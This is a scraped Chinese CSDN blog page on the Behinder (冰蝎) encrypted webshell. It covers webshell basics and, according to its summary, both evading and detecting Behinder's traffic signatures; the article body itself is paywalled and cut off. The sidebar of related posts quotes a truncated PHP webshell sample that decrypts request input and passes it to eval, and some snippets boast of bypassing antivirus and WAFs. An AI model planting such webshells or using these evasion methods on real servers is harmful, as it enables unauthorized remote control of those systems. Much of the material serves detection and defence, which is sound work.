冰蝎加密 WebShell 过杀软

最新推荐文章于 2024-09-30 16:00:00 发布
最新推荐文章于 2024-09-30 16:00:00 发布
阅读量2.4k 收藏 3
点赞数
分类专栏: 全栈网络安全 渗透测试 代码审计 网络安全工具开发 文章标签: java 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35029061/article/details/126133708
版权
本文详细介绍了冰蝎(Behinder)加密WebShell的工作原理、使用方法和流量特征清除策略,以及针对冰蝎的检测思路,包括流量、应用和主机层面的检测。文章还探讨了如何通过修改冰蝎的PHP、JSP和ASP流量特征来避免检测,同时讨论了OpenRASP等应用层防护技术的优缺点,并提供了针对冰蝎流量特征的检测方法。
摘要由CSDN通过智能技术生成

用Web系统语言(如:ASP、PHP、JSP等)编写的WebShell,WebShell上传服务器后当成页面被攻击者访问,常当做后门。

WebShell危害 

做后门; 文件、数据库操作; 修改Web页面......

WebShell的特点

特点一:Web木马可大可小。
特点二:无法有效隐藏。
特点三:具有明显特征值。

命令执行函数:ebval、system、popen、exeshell_exec等。

文件功能函数:fopen、opendir、dirname、pathinfo等。

数据库操作类函数:mysql_query、mysqli_query等。

WebShell必须为可执行的网页格式。

一、冰蝎(Behinder)简介

演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell 正变得越来越流行,由于流量加密,传统的WAF、WebIDS设备难以检测,给威胁监控带来较大挑战。

这其中最出名就是“冰蝎”,“冰蝎”是一款动态二进制加密网站管理客户端,演练中给防守方造成很大困扰,本文将对“冰蝎”的加

了解本专栏 订阅专栏 解锁全文 超级会员免费看
wespten
关注
专栏目录
订阅专栏
哥斯拉加密WebShell
悦分享
08-03 3030
哥斯拉是继菜刀、蚁剑、冰蝎之后具有更多优点的Webshell管理工具,由java语言开发,如名称一样,他的“凶猛”之处主要体现在:1、哥斯拉全部类型的shell均过市面所有静态查。2、静态免这个问题,要客观;工具放出来之后可能会免一段时间,后来就不行了,但是,改改代码还能继续过狗。重点还是要看流量加密和一些自带的插件。3、哥斯拉流量加密能过市面全部流量waf。4、哥斯拉的自带的插件是冰蝎、蚁剑不能比拟的。如此简单的操作界面,实际效果和功能可绝不简单。MSF联动。...
蚁剑加密 WebShell
悦分享
08-03 2269
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。中国蚁剑推崇模块化的开发思想,遵循开源,就要开得漂亮的原则, 致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及 其修改说明,努力让大家可以一起为这个项目贡献出力所能及的点滴,让这款工具真正能让大家用得顺心、舒适,让它能为大家施展出最人性化最适合你的能力!通俗的讲:中国蚁剑与中国菜刀相比,界面更加美观、功能更加齐全,并且自定义的程度更高且开放源代码。...
冰蝎 4.0 加密的代码
震山的博客
09-12 1916
在使用冰蝎进行 WebShell 的时候,它到底发了那些代码呢?
强大的webshell管理工具——冰蝎
12-26
只有适合自己的工具,没有好坏之分,请免费拿走。
第3篇:常见的Webshell工具----应急响应篇
最新发布
星河梦瑾的博客
09-30 860
Sangfor WebShellKill(网站后门检测工具)是一款web后门专工具,不仅支持webshell的扫描,同时还支持暗链的扫描。当然,目前市场上的很多主机安全产品也都提供这种WebShell检测能力,比如阿里云、青藤云、safedog等,本文暂不讨论。专注webshell研究,拥有海量webshell样本和自主查技术,采用传统特征+云端大数据双引擎的查技术。当网站服务器被入侵时,我们需要一款Webshell检测工具,来帮助我们发现webshell,进一步排查系统可能存在的安全漏洞。
冰蝎-Webshell管理工具
weixin_66717977的博客
06-30 9605
冰蝎超详解,新手食用
Web安全-Behinder冰蝎Webshell管理工具使用
Boom!脑洞大爆炸的博客
07-03 3894
Web安全-Behinder冰蝎Webshell管理工具使用
冰歇webshell初探
qq_69775412的博客
04-22 5595
木马样本: <?php class C{ public function __invoke($p) { eval($p.""); } }; session_start(); isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSIO
菜刀、蚁剑以及冰蝎三款Webshell管理工具简介
永远是少年
05-07 6077
今天继续给大家介绍渗透测试相关知识,本文主要内容是菜刀、蚁剑以及冰蝎三款Webshell管理工具简介。 一、三款webshell管理工具简单对比 二、菜刀数据包解析 三、蚁剑数据包解析 四、冰蝎数据包解析
PHP WebShell
悦分享
08-01 6428
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
简单免绕过和利用上线的 GoCS
HBohan的博客
08-23 832
前言: Goby 可以快速准确的扫描资产,并直观呈现出来。同时经过上次 EXP 计划过后,PoC&EXP 也增加了许多。在实战化漏洞扫描后,对于高危漏洞的利用,不仅仅只在 whoami 上,而是要进入后渗透阶段,那么对于 Windows 机器而言,上线 CS 是必不可少的操作,会让后渗透如鱼得水。此插件只运用了简单的利用方式上线 CS,希望师傅们能够提供想法和建议把它更为完善,源码中有详细的注释,可供师傅们快速理解。 0×01 插件使用 1.1 插件效果 1.2 使用方法 1.在工具栏导入 CS
webshell连接工具冰蝎2.0,后面有三点零的,找一找再发
12-28
做渗透的,不支持恶意攻击
冰蝎v2.0.1.zip
05-19
冰蝎webshell连接工具,无毒无后门,可放心使用
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
wangluoanquan111的博客
02-26 1826
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
webshell工具-冰蝎流量特征和加密方式
qq_40898302的博客
05-25 1501
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。而老牌的如中国菜刀因为其流量特征太过明显,从而使用的场景越来越少。
攻防演练的Webshell利器——冰蝎V4分析
Karka_的博客
08-02 857
最近攻防演练期间,Webshell工具界再次祭出大器“
冰蝎加密通信特征
buffedon的博客
01-06 2426
冰蝎加密通信特征密钥交换阶段通信阶段通用特征实例 有填充字段 分为密钥交换阶段和加密通信阶段 密钥交换阶段: 返回16位的密钥,是从md5中截取的(md5不区分大小写,解密后内容相同) 加密通信阶段: base64加密,然后再AES 或 XOR 加密 特征 密钥交换阶段 弱特征:url url: \.(php|jsp|asp|jspx|asa)\?(\w){1,10}=\d{2,3}HTTP/1.1 弱特征:responseBody responseBody: 16位的密钥
Webshell管理(冰蝎
weixin_45253622的博客
03-15 2366
冰蝎 运行环境安装(jre6~jre8) 工具安装 解压后如下: 需要在文件夹内运行终端,我们新建.txt 文件,文本内容添加cmd,并将其后缀改为.bat 双击运行。 测试(本机) 启动phpstudy 访问127.0.0.1:8080成功访问。 在网站根目录下创建木马文件,将冰蝎server自带shell.php内容复制进去 然后使用冰蝎连接,默认密码在内容里 双击目录,连接成功。 首页就是phpinfo 基本信息模块 命令执行 虚拟终端 文件管理 内网渗透 反弹shell 这里
用ZendGuard 加密php webshell
Coisini的博客
06-09 510
现在很多linux管理员都会一招,grep eval 大法,查找那些年错过的webshell,那些年错过的基友们苦思冥想出了对抗的办法。 ZendGuard是一款php的加密工具,它可以编译php源码变为字节码,类似于java的虚拟机的字节码,然后让zend虚拟机运行字节码,以此来提高php的运行速度,因为不用虚拟机,php运行脚本的方式是读一行代码,运行一行,效率很低,而虚拟机则效率高多了,题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wespten

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值